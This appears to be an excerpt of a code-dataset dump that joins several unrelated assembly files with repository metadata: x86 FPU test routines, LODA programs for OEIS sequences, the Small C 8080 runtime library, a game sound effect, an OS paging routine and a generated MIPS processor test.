var3 ret Fld1Fstp_k ENDP Fld1Fstp_l PROC fld1 fld1 fld1 fstp var1 fstp var2 fstp var3 ret Fld1Fstp_l ENDP Fld1Fstp_l1 PROC fld1 fld1 fld1 fstp var1 fstp var2 fstp var3 ret Fld1Fstp_l1 ENDP Fld1Fstp_l2 PROC fld1 fld1 fld1 fstp var1 fstp var2 fstp var3 ret Fld1Fstp_l2 ENDP Fld1Fstp_m PROC fld1 fld1 fld1 mov eax, dword ptr [esp+4] call eax fstp var1 fstp var2 fstp var3 ret Fld1Fstp_m ENDP Fld1Fstp_n PROC fld1 fld1 fld1 mov eax, dword ptr [esp+4] call eax fstp var1 fstp var2 fstp var3 ret Fld1Fstp_n ENDP Fld1Fstp_o PROC fld1 fld1 fld1 mov eax, dword ptr [esp+4] call eax fstp var1 fstp var2 fstp var3 ret Fld1Fstp_o ENDP Fld1Fstp_p PROC fld1 fld1 fld1 mov eax, dword ptr [esp+4] call eax fstp var1 fstp var2 fstp var3 ret Fld1Fstp_p ENDP Fld1Fstp_q PROC fld1 fld1 fld1 mov eax, dword ptr [esp+4] call eax fstp var1 fstp var2 fstp var3 ret Fld1Fstp_q ENDP Fld1Fstp_n1 PROC fld1 fld1 fld1 mov eax, dword ptr [esp+4] call eax fstp var1 fstp var2 fstp var3 ret Fld1Fstp_n1 ENDP Fld1_aa PROC fld1 fld1 fld1 ret Fld1_aa ENDP Fld1_ab PROC fld1 fld1 fld1 ret Fld1_ab ENDP Fld1_ac PROC fld1 fld1 fld1 ret Fld1_ac ENDP Fld1_ad PROC fld1 fld1 fld1 ret Fld1_ad ENDP Fld1_ae PROC fld1 fld1 fld1 ret Fld1_ae ENDP Fld1_af PROC fld1 fld1 fld1 ret Fld1_af ENDP Fld1_ag PROC fld1 fld1 fld1 ret Fld1_ag ENDP Fld1FstpSetXmmsMaskMxcsr PROC fld1 fld1 fld1 call SetXmmRegsToZero call MaskZeroDivideInMxcsr fstp var1 fstp var2 fstp var3 ret Fld1FstpSetXmmsMaskMxcsr ENDP IntScratchFld1Fstp_a PROC mov eax, 0deadbeefH mov ecx, 0deadbeefH mov edx, 0deadbeefH fld1 fld1 fld1 fstp var1 fstp var2 fstp var3 ret IntScratchFld1Fstp_a ENDP IntScratchFld1Fstp_b PROC mov eax, 0deadbeefH mov ecx, 0deadbeefH mov edx, 0deadbeefH fld1 fld1 fld1 fstp var1 fstp var2 fstp var3 ret IntScratchFld1Fstp_b ENDP IntScratchFld1Fstp_c PROC mov eax, 0deadbeefH mov ecx, 0deadbeefH mov edx, 0deadbeefH fld1 fld1 fld1 fstp var1 fstp var2 fstp var3 ret IntScratchFld1Fstp_c ENDP IntScratchFld1Fstp_d PROC mov eax, 0deadbeefH mov ecx, 0deadbeefH mov edx, 0deadbeefH fld1 fld1 fld1 fstp var1 fstp var2 fstp var3 ret IntScratchFld1Fstp_d ENDP SetIntRegsToZero PROC xor eax, eax xor ecx, ecx xor edx, edx ret SetIntRegsToZero ENDP get_gax PROC ret get_gax ENDP get_gbx PROC mov eax, ebx ret get_gbx ENDP get_gcx PROC mov eax, ecx ret get_gcx ENDP get_gdx PROC mov eax, edx ret get_gdx ENDP get_gdi PROC mov eax, edi ret get_gdi ENDP get_gsi PROC mov eax, esi ret get_gsi ENDP get_gbp PROC mov eax, ebp ret get_gbp ENDP set_gax PROC mov eax, dword ptr [esp+4] ret set_gax ENDP set_gbx PROC mov ebx, dword ptr [esp+4] ret set_gbx ENDP set_gcx PROC mov ecx, dword ptr [esp+4] ret set_gcx ENDP set_gdx PROC mov edx, dword ptr [esp+4] ret set_gdx ENDP set_gdi PROC mov edi, dword ptr [esp+4] ret set_gdi ENDP set_gsi PROC mov esi, dword ptr [esp+4] ret set_gsi ENDP set_gbp PROC mov ebp, dword ptr [esp+4] ret set_gbp ENDP FldzToTop3 PROC fstp dummy fstp dummy fstp dummy fldz fldz fldz ret FldzToTop3 ENDP Fld2tToTop3 PROC fstp dummy fstp dummy fstp dummy fldl2t fldl2t fldl2t ret Fld2tToTop3 ENDP Fstp3 PROC fstp dummy fstp dummy fstp dummy ret Fstp3 ENDP Fstp_x PROC fstp dummy fstp dummy fstp dummy ret Fstp_x ENDP Fld1_x PROC fld1 fld1 fld1 ret Fld1_x ENDP SetXmmRegsToZero PROC pxor xmm0, xmm0 pxor xmm1, xmm1 pxor xmm2, xmm2 pxor xmm3, xmm3 pxor xmm4, xmm4 pxor xmm5, xmm5 pxor xmm6, xmm6 pxor xmm7, xmm7 ret SetXmmRegsToZero ENDP AddToXmmRegs PROC lea eax, val1 mov eax, dword ptr [eax] paddd xmm0, xmmword ptr [eax] lea eax, val2 mov eax, dword ptr [eax] paddd xmm1, xmmword ptr [eax] lea eax, val3 mov eax, dword ptr [eax] paddd xmm2, xmmword ptr [eax] lea eax, val4 mov eax, dword ptr [eax] paddd xmm3, xmmword ptr [eax] lea eax, val5 mov eax, dword ptr [eax] paddd xmm4, xmmword ptr [eax] lea eax, val6 mov eax, dword ptr [eax] paddd xmm5, xmmword ptr [eax] lea eax, val7 mov eax, dword ptr [eax] paddd xmm6, xmmword ptr [eax] lea eax, val8 mov eax, dword ptr [eax] paddd xmm7, xmmword ptr [eax] ret AddToXmmRegs ENDP GetMxcsr PROC push eax stmxcsr [esp] pop eax ret GetMxcsr ENDP MaskZeroDivideInMxcsr PROC call GetMxcsr or eax, 200H push eax ldmxcsr [esp] pop eax ret MaskZeroDivideInMxcsr ENDP UnMaskZeroDivideInMxcsr PROC call GetMxcsr mov ecx, 200H not ecx and eax, ecx push eax ldmxcsr [esp] pop eax ret UnMaskZeroDivideInMxcsr ENDP GetFlags PROC pushfd pop eax ret GetFlags ENDP SetFlags PROC push setFlagsX popfd ret SetFlags ENDP end

13.957182

73

0.682335

e62e715be0b8a392c08ee5588549dd155e920c3e

1,234

asm

Assembly

programs/oeis/017/A017320.asm

neoneye/loda

afe9559fb53ee12e3040da54bd6aa47283e0d9ec

[ "Apache-2.0" ]

22

2018-02-06T19:19:31.000Z

2022-01-17T21:53:31.000Z

programs/oeis/017/A017320.asm

neoneye/loda

afe9559fb53ee12e3040da54bd6aa47283e0d9ec

[ "Apache-2.0" ]

41

2021-02-22T19:00:34.000Z

2021-08-28T10:47:47.000Z

programs/oeis/017/A017320.asm

neoneye/loda

afe9559fb53ee12e3040da54bd6aa47283e0d9ec

[ "Apache-2.0" ]

5

2021-02-24T21:14:16.000Z

2021-08-09T19:48:05.000Z

; A017320: a(n) = (10*n + 4)^4. ; 256,38416,331776,1336336,3748096,8503056,16777216,29986576,49787136,78074896,116985856,168896016,236421376,322417936,429981696,562448656,723394816,916636176,1146228736,1416468496,1731891456,2097273616,2517630976,2998219536,3544535296,4162314256,4857532416,5636405776,6505390336,7471182096,8540717056,9721171216,11019960576,12444741136,14003408896,15704099856,17555190016,19565295376,21743271936,24098215696,26639462656,29376588816,32319410176,35477982736,38862602496,42483805456,46352367616,50479304976,54875873536,59553569296,64524128256,69799526416,75391979776,81313944336,87578116096,94197431056,101185065216,108554434576,116319195136,124493242896,133090713856,142125984016,151613669376,161568625936,172005949696,182940976656,194389282816,206366684176,218889236736,231973236496,245635219456,259891961616,274760478976,290258027536,306402103296,323210442256,340701020416,358892053776,377801998336,397449550096,417853645056,439033459216,461008408576,483798149136,507422576896,531901827856,557256278016,583506543376,610673479936,638778183696,667841990656,697886476816,728933458176,761004990736,794123370496,828311133456,863591055616,899986152976,937519681536,976215137296 mul $0,10 add $0,4 pow $0,4

176.285714

1,172

0.89222

b319cbd4b0798dfc6d7b9baf7006d63474d36d3b

738

asm

Assembly

oeis/033/A033648.asm

neoneye/loda-programs

84790877f8e6c2e821b183d2e334d612045d29c0

[ "Apache-2.0" ]

11

2021-08-22T19:44:55.000Z

2022-03-20T16:47:57.000Z

oeis/033/A033648.asm

neoneye/loda-programs

84790877f8e6c2e821b183d2e334d612045d29c0

[ "Apache-2.0" ]

9

2021-08-29T13:15:54.000Z

2022-03-09T19:52:31.000Z

oeis/033/A033648.asm

neoneye/loda-programs

84790877f8e6c2e821b183d2e334d612045d29c0

[ "Apache-2.0" ]

3

2021-08-22T20:56:47.000Z

2021-09-29T06:26:12.000Z

; A033648: Trajectory of 3 under map x->x + (x-with-digits-reversed). ; Submitted by Jon Maiga ; 3,6,12,33,66,132,363,726,1353,4884,9768,18447,92928,175857,934428,1758867,9447438,17794887,96644658,182289327,906271608,1712444217,8836886388,17673772776,85401510447,159803020905,668823329856,1327746658722,3606313135953,7201626272016,13304352533043,47337877873374,94675755746748,179440511504397,972845626549368,1836791253097647,9304694775074028,17509400550038067,93592406050528638,177274911110958177,949133922230430948,1798167954459762897,9780847499057381868,18462685009004862747 mov $2,$0 lpb $2 mov $0,$1 add $0,3 seq $0,4086 ; Read n backwards (referred to as R(n) in many sequences). add $1,$0 sub $2,1 lpe mov $0,$1 add $0,3

49.2

481

0.808943

d60070ab324d3e31098b0e022573d19fb2508f2b

7,235

asm

Assembly

smallC/8080/crun.asm

2kranki/SmallC-85

b101d78dbaa01545f208ec0859abc7600d050eca

[ "Unlicense" ]

236

2015-01-13T12:33:26.000Z

2022-03-16T07:18:49.000Z

smallC/8080/crun.asm

lcgamboa/SmallC-85

699809b6cf555aea3c69177c92c059d2741bfd55

[ "Unlicense" ]

21

2015-04-26T07:35:34.000Z

2020-12-18T13:31:55.000Z

smallC/8080/crun.asm

lcgamboa/SmallC-85

699809b6cf555aea3c69177c92c059d2741bfd55

[ "Unlicense" ]

53

2015-01-21T12:54:44.000Z

2022-01-14T07:01:39.000Z

; ;***************************************************** ; * ; runtime library for small C compiler * ; * ; c.s - runtime routine for basic C code * ; * ; Ron Cain * ; * ;***************************************************** ; cseg ; public ?gchar,?gint,?pchar,?pint public ?sxt public ?or,?and,?xor public ?eq,?ne,?gt,?le,?ge,?lt,?uge,?ult,?ugt,?ule public ?asr,?asl public ?sub,?neg,?com,?lneg,?bool,?mul,?div public ?case,brkend,Xstktop public etext public edata ; ; fetch char from (HL) and sign extend into HL ?gchar: mov a,m ?sxt: mov l,a rlc sbb a mov h,a ret ; fetch int from (HL) ?gint: mov a,m inx h mov h,m mov l,a ret ; store char from HL into (DE) ?pchar: mov a,l stax d ret ; store int from HL into (DE) ?pint: mov a,l stax d inx d mov a,h stax d ret ; "or" HL and DE into HL ?or: mov a,l ora e mov l,a mov a,h ora d mov h,a ret ; "xor" HL and DE into HL ?xor: mov a,l xra e mov l,a mov a,h xra d mov h,a ret ; "and" HL and DE into HL ?and: mov a,l ana e mov l,a mov a,h ana d mov h,a ret ; ;......logical operations: HL set to 0 (false) or 1 (true) ; ; DE == HL ?eq: call ?cmp rz dcx h ret ; DE != HL ?ne: call ?cmp rnz dcx h ret ; DE > HL [signed] ?gt: xchg call ?cmp rc dcx h ret ; DE <= HL [signed] ?le: call ?cmp rz rc dcx h ret ; DE >= HL [signed] ?ge: call ?cmp rnc dcx h ret ; DE < HL [signed] ?lt: call ?cmp rc dcx h ret ; DE >= HL [unsigned] ?uge: call ?ucmp rnc dcx h ret ; DE < HL [unsigned] ?ult: call ?ucmp rc dcx h ret ; DE > HL [unsigned] ?ugt: xchg call ?ucmp rc dcx h ret ; DE <= HL [unsigned] ?ule: call ?ucmp rz rc dcx h ret ; signed compare of DE and HL ; carry is sign of difference [set => DE < HL] ; zero is zero/non-zero ?cmp: mov a,e sub l mov e,a mov a,d sbb h lxi h,1 ;preset true jm ?cmp1 ora e ;resets carry ret ?cmp1: ora e stc ret ; unsigned compare of DE and HL ; carry is sign of difference [set => DE < HL] ; zero is zero/non-zero ?ucmp: mov a,d cmp h jnz ?ucmp1 mov a,e cmp l ?ucmp1: lxi h,1 ;preset true ret ; shift DE right arithmetically by HL, move to HL ?asr: xchg ?asr1: dcr e rm mov a,h ral mov a,h rar mov h,a mov a,l rar mov l,a jmp ?asr1 ; shift DE left arithmetically by HL, move to HL ?asl: xchg ?asl1: dcr e rm dad h jmp ?asl1 ; HL = DE - HL ?sub: mov a,e sub l mov l,a mov a,d sbb h mov h,a ret ; HL = -HL ?neg: call ?com inx h ret ; HL = ~HL ?com: mov a,h cma mov h,a mov a,l cma mov l,a ret ; HL = !HL ?lneg: mov a,h ora l jz ?lneg1 lxi h,0 ret ?lneg1: inx h ret ; HL = !!HL ?bool: call ?lneg jmp ?lneg ; ; HL = DE * HL [signed] ?mul: mov b,h mov c,l lxi h,0 ?mul1: mov a,c rrc jnc ?mul2 dad d ?mul2: xra a mov a,b rar mov b,a mov a,c rar mov c,a ora b rz xra a mov a,e ral mov e,a mov a,d ral mov d,a ora e rz jmp ?mul1 ; HL = DE / HL, DE = DE % HL ?div: mov b,h mov c,l mov a,d xra b push psw mov a,d ora a cm ?deneg mov a,b ora a cm ?bcneg mvi a,16 push psw xchg lxi d,0 ?div1: dad h call ?rdel jz ?div2 call ?cmpbd jm ?div2 mov a,l ori 1 mov l,a mov a,e sub c mov e,a mov a,d sbb b mov d,a ?div2: pop psw dcr a jz ?div3 push psw jmp ?div1 ?div3: pop psw rp call ?deneg xchg call ?deneg xchg ret ; {DE = -DE} ?deneg: mov a,d cma mov d,a mov a,e cma mov e,a inx d ret ; {BC = -BC} ?bcneg: mov a,b cma mov b,a mov a,c cma mov c,a inx b ret ; {DE <r<r 1} ?rdel: mov a,e ral mov e,a mov a,d ral mov d,a ora e ret ; {BC : DE} ?cmpbd: mov a,e sub c mov a,d sbb b ret ; case jump ?case: xchg ;switch value to DE pop h ;get table address ?case1: call ?case4 ;get case value mov a,e cmp c ;equal to switch value ? jnz ?case2 ;no mov a,d cmp b ;equal to switch value ? jnz ?case2 ;no call ?case4 ;get case label jz ?case3 ;end of table, go to default push b ret ;case jump ?case2: call ?case4 ;get case label jnz ?case1 ;next case ?case3: dcx h dcx h dcx h mov d,m dcx h mov e,m xchg pchl ;default jump ?case4: mov c,m inx h mov b,m inx h mov a,c ora b ret ; ; ; Xstktop: lxi h,0 ;return current stack pointer (for sbrk) dad sp ret cseg etext: dseg brkend: dw edata ;current "break" edata: ; ; ; end

20.495751

72

0.344575

d69d60de9a49f77e29d5c2cc283e29de76f44fd3

227

asm

Assembly

audio/sfx/shrink_1.asm

adhi-thirumala/EvoYellow

6fb1b1d6a1fa84b02e2d982f270887f6c63cdf4c

[ "Unlicense" ]

16

2018-08-28T21:47:01.000Z

2022-02-20T20:29:59.000Z

audio/sfx/shrink_1.asm

adhi-thirumala/EvoYellow

6fb1b1d6a1fa84b02e2d982f270887f6c63cdf4c

[ "Unlicense" ]

5

2019-04-03T19:53:11.000Z

2022-03-11T22:49:34.000Z

audio/sfx/shrink_1.asm

adhi-thirumala/EvoYellow

6fb1b1d6a1fa84b02e2d982f270887f6c63cdf4c

[ "Unlicense" ]

2

2019-12-09T19:46:02.000Z

2020-12-05T21:36:30.000Z

SFX_Shrink_1_Ch1: duty 1 unknownsfx0x10 23 unknownsfx0x20 15, 215, 0, 6 unknownsfx0x20 15, 183, 128, 5 unknownsfx0x20 15, 135, 0, 5 unknownsfx0x20 15, 71, 128, 4 unknownsfx0x20 15, 23, 0, 4 unknownsfx0x10 8 endchannel

20.636364

31

0.744493

bd9089617b38c974b46e10c24fff835d431623b9

143

asm

Assembly

kernel/mem/paging.asm

a0w-svg/AzamiOS

76424d7a58b7c36345e2ddb43bf561fb58e1de0b

[ "BSD-3-Clause" ]

2

2021-08-05T18:31:57.000Z

2021-08-13T13:39:12.000Z

kernel/mem/paging.asm

a0w-svg/AzamiOS

76424d7a58b7c36345e2ddb43bf561fb58e1de0b

[ "BSD-3-Clause" ]

null

kernel/mem/paging.asm

a0w-svg/AzamiOS

76424d7a58b7c36345e2ddb43bf561fb58e1de0b

[ "BSD-3-Clause" ]

null

global switch_page_dir switch_page_dir: mov eax, [esp+4] mov cr3, eax mov ebx, cr0 or ebx, 0x80010000 mov cr0, ebx ret

15.888889

22

0.636364

31988dd5121e6edf2a7c7b8df4c70d09529c6ffe

574

asm

Assembly

oeis/030/A030179.asm

neoneye/loda-programs

84790877f8e6c2e821b183d2e334d612045d29c0

[ "Apache-2.0" ]

11

2021-08-22T19:44:55.000Z

2022-03-20T16:47:57.000Z

oeis/030/A030179.asm

neoneye/loda-programs

84790877f8e6c2e821b183d2e334d612045d29c0

[ "Apache-2.0" ]

9

2021-08-29T13:15:54.000Z

2022-03-09T19:52:31.000Z

oeis/030/A030179.asm

neoneye/loda-programs

84790877f8e6c2e821b183d2e334d612045d29c0

[ "Apache-2.0" ]

3

2021-08-22T20:56:47.000Z

2021-09-29T06:26:12.000Z

; A030179: Quarter-squares squared: A002620^2. ; 0,0,1,4,16,36,81,144,256,400,625,900,1296,1764,2401,3136,4096,5184,6561,8100,10000,12100,14641,17424,20736,24336,28561,33124,38416,44100,50625,57600,65536,73984,83521,93636,104976,116964,130321,144400,160000,176400,194481,213444,234256,256036,279841,304704,331776,360000,390625,422500,456976,492804,531441,571536,614656,659344,707281,756900,810000,864900,923521,984064,1048576,1115136,1185921,1258884,1336336,1416100,1500625,1587600,1679616,1774224,1874161,1976836,2085136,2196324,2313441,2433600 pow $0,2 div $0,4 pow $0,2

82

498

0.815331

2925b776b6a7b2e8d39ee0da47ac65ecd91f4510

999

asm

Assembly

programs/oeis/293/A293411.asm

jmorken/loda

99c09d2641e858b074f6344a352d13bc55601571

[ "Apache-2.0" ]

1

2021-03-15T11:38:20.000Z

programs/oeis/293/A293411.asm

jmorken/loda

99c09d2641e858b074f6344a352d13bc55601571

[ "Apache-2.0" ]

null

programs/oeis/293/A293411.asm

jmorken/loda

99c09d2641e858b074f6344a352d13bc55601571

[ "Apache-2.0" ]

null

; A293411: a(n) = a(n-1) + a(n-3) + a(n-4), where a(0) = 1, a(1) = 2, a(2) = 3, a(3) = 4. ; 1,2,3,4,7,12,19,30,49,80,129,208,337,546,883,1428,2311,3740,6051,9790,15841,25632,41473,67104,108577,175682,284259,459940,744199,1204140,1948339,3152478,5100817,8253296,13354113,21607408,34961521,56568930,91530451,148099380,239629831,387729212,627359043,1015088254,1642447297,2657535552,4299982849,6957518400,11257501249,18215019650,29472520899,47687540548,77160061447,124847601996,202007663443,326855265438,528862928881,855718194320,1384581123201,2240299317520,3624880440721,5865179758242,9490060198963,15355239957204,24845300156167,40200540113372,65045840269539,105246380382910,170292220652449,275538601035360,445830821687809,721369422723168,1167200244410977,1888569667134146,3055769911545123,4944339578679268,8000109490224391 mov $5,$0 mov $7,$0 add $7,1 lpb $7 clr $0,5 mov $0,$5 sub $7,1 sub $0,$7 add $4,32 cal $0,$4 mov $1,$0 div $1,5 mul $1,2 add $1,1 add $6,$1 lpe mov $1,$6

47.571429

730

0.770771

8e855d8e9b08706d3d608cc14a3bccc1baefda71

254

asm

Assembly

libsrc/_DEVELOPMENT/stdio/c/sccz80/vasprintf_callee.asm

jpoikela/z88dk

7108b2d7e3a98a77de99b30c9a7c9199da9c75cb

[ "ClArtistic" ]

640

2017-01-14T23:33:45.000Z

2022-03-30T11:28:42.000Z

libsrc/_DEVELOPMENT/stdio/c/sccz80/vasprintf_callee.asm

jpoikela/z88dk

7108b2d7e3a98a77de99b30c9a7c9199da9c75cb

[ "ClArtistic" ]

1,600

2017-01-15T16:12:02.000Z

2022-03-31T12:11:12.000Z

libsrc/_DEVELOPMENT/stdio/c/sccz80/vasprintf_callee.asm

jpoikela/z88dk

7108b2d7e3a98a77de99b30c9a7c9199da9c75cb

[ "ClArtistic" ]

215

2017-01-17T10:43:03.000Z

2022-03-23T17:25:02.000Z

; int vasprintf(char **ptr, const char *format, void *arg) SECTION code_clib SECTION code_stdio PUBLIC vasprintf_callee EXTERN asm_vasprintf vasprintf_callee: pop af pop bc pop de exx pop de exx push af jp asm_vasprintf

11.545455

58

0.700787

b928d12cc38354f89af916210ea638e4a32b0655

782

asm

Assembly

programs/oeis/052/A052993.asm

karttu/loda

9c3b0fc57b810302220c044a9d17db733c76a598

[ "Apache-2.0" ]

1

2021-03-15T11:38:20.000Z

programs/oeis/052/A052993.asm

karttu/loda

9c3b0fc57b810302220c044a9d17db733c76a598

[ "Apache-2.0" ]

null

programs/oeis/052/A052993.asm

karttu/loda

9c3b0fc57b810302220c044a9d17db733c76a598

[ "Apache-2.0" ]

null

; A052993: a(n) = a(n-1) + 3*a(n-2) - 3*a(n-3), with a(0)=a(1)=1, a(2)=4. ; 1,1,4,4,13,13,40,40,121,121,364,364,1093,1093,3280,3280,9841,9841,29524,29524,88573,88573,265720,265720,797161,797161,2391484,2391484,7174453,7174453,21523360,21523360,64570081,64570081,193710244,193710244,581130733,581130733,1743392200,1743392200,5230176601,5230176601,15690529804,15690529804,47071589413,47071589413,141214768240,141214768240,423644304721,423644304721,1270932914164,1270932914164,3812798742493,3812798742493,11438396227480,11438396227480,34315188682441,34315188682441,102945566047324,102945566047324,308836698141973,308836698141973,926510094425920,926510094425920,2779530283277761,2779530283277761,8338590849833284,8338590849833284 div $0,2 mov $1,3 pow $1,$0 div $1,2 mul $1,3 add $1,1

78.2

651

0.823529

69b5dc7a9386cc122889d4340ffd60d88ae1e14e

7,460

asm

Assembly

P6/data_P6_2/cal_R_test32.asm

alxzzhou/BUAA_CO_2020

b54bf367081a5a11701ebc3fc78a23494aecca9e

[ "Apache-2.0" ]

1

2022-01-23T09:24:47.000Z

P6/data_P6_2/cal_R_test32.asm

alxzzhou/BUAA_CO_2020

b54bf367081a5a11701ebc3fc78a23494aecca9e

[ "Apache-2.0" ]

null

P6/data_P6_2/cal_R_test32.asm

alxzzhou/BUAA_CO_2020

b54bf367081a5a11701ebc3fc78a23494aecca9e

[ "Apache-2.0" ]

null

lui $1,65327 ori $1,$1,35829 lui $2,32538 ori $2,$2,56991 lui $3,56670 ori $3,$3,36131 lui $4,26785 ori $4,$4,33803 lui $5,56277 ori $5,$5,10749 lui $6,60796 ori $6,$6,29939 mthi $1 mtlo $2 sec0: nop nop nop addu $5,$6,$2 sec1: nop nop nor $6,$2,$5 addu $3,$6,$2 sec2: nop nop sltiu $6,$3,-28552 addu $3,$6,$2 sec3: nop nop mfhi $6 addu $0,$6,$2 sec4: nop nop lhu $6,10($0) addu $3,$6,$2 sec5: nop subu $6,$2,$6 nop addu $1,$6,$2 sec6: nop or $6,$1,$2 subu $6,$5,$3 addu $3,$6,$2 sec7: nop subu $6,$3,$5 lui $6,18545 addu $2,$6,$2 sec8: nop nor $6,$3,$0 mflo $6 addu $1,$6,$2 sec9: nop addu $6,$4,$5 lh $6,14($0) addu $3,$6,$2 sec10: nop ori $6,$5,51427 nop addu $3,$6,$2 sec11: nop ori $6,$1,14799 or $6,$2,$2 addu $5,$6,$2 sec12: nop addiu $6,$2,2100 addiu $6,$6,14463 addu $3,$6,$2 sec13: nop xori $6,$4,278 mflo $6 addu $3,$6,$2 sec14: nop sltiu $6,$3,7479 lb $6,15($0) addu $3,$6,$2 sec15: nop mfhi $6 nop addu $1,$6,$2 sec16: nop mfhi $6 and $6,$3,$2 addu $5,$6,$2 sec17: nop mfhi $6 andi $6,$3,13305 addu $3,$6,$2 sec18: nop mflo $6 mfhi $6 addu $6,$6,$2 sec19: nop mflo $6 lb $6,12($0) addu $5,$6,$2 sec20: nop lhu $6,6($0) nop addu $4,$6,$2 sec21: nop lh $6,0($0) or $6,$3,$2 addu $6,$6,$2 sec22: nop lhu $6,10($0) xori $6,$5,61692 addu $2,$6,$2 sec23: nop lh $6,0($0) mflo $6 addu $4,$6,$2 sec24: nop lbu $6,5($0) lb $6,0($0) addu $2,$6,$2 sec25: subu $2,$1,$1 nop nop addu $2,$6,$2 sec26: subu $2,$2,$3 nop or $6,$2,$2 addu $4,$6,$2 sec27: or $2,$5,$0 nop ori $6,$2,36747 addu $4,$6,$2 sec28: and $2,$4,$5 nop mfhi $6 addu $6,$6,$2 sec29: sltu $2,$6,$3 nop lhu $6,2($0) addu $2,$6,$2 sec30: and $2,$3,$2 addu $6,$3,$3 nop addu $3,$6,$2 sec31: subu $2,$3,$4 xor $6,$3,$1 and $6,$2,$2 addu $3,$6,$2 sec32: slt $2,$4,$3 nor $6,$4,$1 xori $6,$5,16723 addu $2,$6,$2 sec33: subu $2,$4,$5 addu $6,$4,$4 mfhi $6 addu $5,$6,$2 sec34: or $2,$6,$3 and $6,$0,$3 lbu $6,3($0) addu $3,$6,$2 sec35: slt $2,$4,$3 slti $6,$4,8627 nop addu $1,$6,$2 sec36: and $2,$0,$4 lui $6,42362 sltu $6,$3,$2 addu $4,$6,$2 sec37: addu $2,$1,$4 xori $6,$4,42430 sltiu $6,$4,-3030 addu $2,$6,$2 sec38: subu $2,$4,$3 andi $6,$3,30719 mfhi $6 addu $2,$6,$2 sec39: addu $2,$5,$5 sltiu $6,$4,32026 lbu $6,14($0) addu $2,$6,$2 sec40: subu $2,$3,$5 mflo $6 nop addu $4,$6,$2 sec41: addu $2,$4,$4 mflo $6 addu $6,$4,$5 addu $6,$6,$2 sec42: xor $2,$2,$3 mfhi $6 andi $6,$3,6340 addu $1,$6,$2 sec43: sltu $2,$2,$6 mfhi $6 mfhi $6 addu $2,$6,$2 sec44: xor $2,$1,$2 mflo $6 lbu $6,9($0) addu $1,$6,$2 sec45: xor $2,$4,$4 lb $6,6($0) nop addu $3,$6,$2 sec46: and $2,$2,$5 lh $6,2($0) sltu $6,$2,$2 addu $3,$6,$2 sec47: or $2,$0,$6 lh $6,14($0) ori $6,$2,46198 addu $2,$6,$2 sec48: sltu $2,$5,$3 lw $6,0($0) mfhi $6 addu $5,$6,$2 sec49: xor $2,$5,$2 lw $6,0($0) lh $6,4($0) addu $3,$6,$2 sec50: ori $2,$4,50973 nop nop addu $5,$6,$2 sec51: andi $2,$4,19807 nop or $6,$6,$0 addu $2,$6,$2 sec52: sltiu $2,$1,14975 nop ori $6,$5,20803 addu $2,$6,$2 sec53: slti $2,$3,12966 nop mflo $6 addu $2,$6,$2 sec54: slti $2,$5,3215 nop lhu $6,10($0) addu $3,$6,$2 sec55: andi $2,$4,16063 subu $6,$3,$4 nop addu $3,$6,$2 sec56: xori $2,$2,33830 sltu $6,$5,$4 or $6,$3,$6 addu $4,$6,$2 sec57: xori $2,$5,39399 and $6,$2,$4 addiu $6,$4,-28102 addu $3,$6,$2 sec58: xori $2,$2,9307 or $6,$2,$6 mflo $6 addu $3,$6,$2 sec59: xori $2,$3,55594 and $6,$2,$4 lhu $6,16($0) addu $3,$6,$2 sec60: sltiu $2,$2,23786 sltiu $6,$3,-19226 nop addu $5,$6,$2 sec61: xori $2,$1,57735 addiu $6,$3,2637 and $6,$5,$5 addu $1,$6,$2 sec62: sltiu $2,$4,-1032 sltiu $6,$5,18753 sltiu $6,$4,2817 addu $2,$6,$2 sec63: slti $2,$4,27353 addiu $6,$1,4586 mfhi $6 addu $3,$6,$2 sec64: andi $2,$1,9569 lui $6,22221 lh $6,6($0) addu $5,$6,$2 sec65: sltiu $2,$3,-27945 mflo $6 nop addu $1,$6,$2 sec66: ori $2,$3,16116 mflo $6 nor $6,$4,$4 addu $5,$6,$2 sec67: sltiu $2,$1,27451 mfhi $6 addiu $6,$1,31534 addu $5,$6,$2 sec68: sltiu $2,$5,-4939 mflo $6 mfhi $6 addu $5,$6,$2 sec69: slti $2,$3,3574 mfhi $6 lh $6,0($0) addu $6,$6,$2 sec70: addiu $2,$1,-21568 lhu $6,4($0) nop addu $4,$6,$2 sec71: lui $2,60447 lh $6,14($0) sltu $6,$5,$6 addu $3,$6,$2 sec72: xori $2,$2,2752 lbu $6,12($0) ori $6,$2,774 addu $4,$6,$2 sec73: slti $2,$6,10213 lbu $6,13($0) mflo $6 addu $3,$6,$2 sec74: xori $2,$2,63311 lw $6,16($0) lbu $6,8($0) addu $4,$6,$2 sec75: mflo $2 nop nop addu $1,$6,$2 sec76: mflo $2 nop nor $6,$5,$1 addu $2,$6,$2 sec77: mfhi $2 nop sltiu $6,$5,-15842 addu $0,$6,$2 sec78: mfhi $2 nop mfhi $6 addu $1,$6,$2 sec79: mfhi $2 nop lhu $6,12($0) addu $4,$6,$2 sec80: mfhi $2 xor $6,$4,$3 nop addu $5,$6,$2 sec81: mflo $2 or $6,$1,$4 subu $6,$2,$3 addu $5,$6,$2 sec82: mfhi $2 addu $6,$0,$6 addiu $6,$5,9952 addu $3,$6,$2 sec83: mflo $2 slt $6,$6,$3 mfhi $6 addu $3,$6,$2 sec84: mflo $2 subu $6,$2,$4 lhu $6,2($0) addu $0,$6,$2 sec85: mflo $2 slti $6,$2,-31082 nop addu $4,$6,$2 sec86: mflo $2 andi $6,$1,28886 or $6,$3,$1 addu $4,$6,$2 sec87: mflo $2 sltiu $6,$5,-11320 andi $6,$6,15556 addu $3,$6,$2 sec88: mflo $2 andi $6,$2,27206 mflo $6 addu $3,$6,$2 sec89: mflo $2 slti $6,$4,32667 lbu $6,1($0) addu $4,$6,$2 sec90: mfhi $2 mflo $6 nop addu $2,$6,$2 sec91: mfhi $2 mfhi $6 sltu $6,$0,$5 addu $3,$6,$2 sec92: mflo $2 mfhi $6 sltiu $6,$5,-9881 addu $4,$6,$2 sec93: mfhi $2 mflo $6 mflo $6 addu $4,$6,$2 sec94: mflo $2 mflo $6 lh $6,16($0) addu $3,$6,$2 sec95: mflo $2 lh $6,14($0) nop addu $3,$6,$2 sec96: mfhi $2 lhu $6,14($0) nor $6,$1,$3 addu $0,$6,$2 sec97: mfhi $2 lh $6,14($0) sltiu $6,$6,20100 addu $3,$6,$2 sec98: mflo $2 lh $6,4($0) mflo $6 addu $4,$6,$2 sec99: mfhi $2 lhu $6,12($0) lw $6,0($0) addu $0,$6,$2 sec100: lbu $2,9($0) nop nop addu $3,$6,$2 sec101: lw $2,12($0) nop xor $6,$4,$5 addu $3,$6,$2 sec102: lh $2,16($0) nop slti 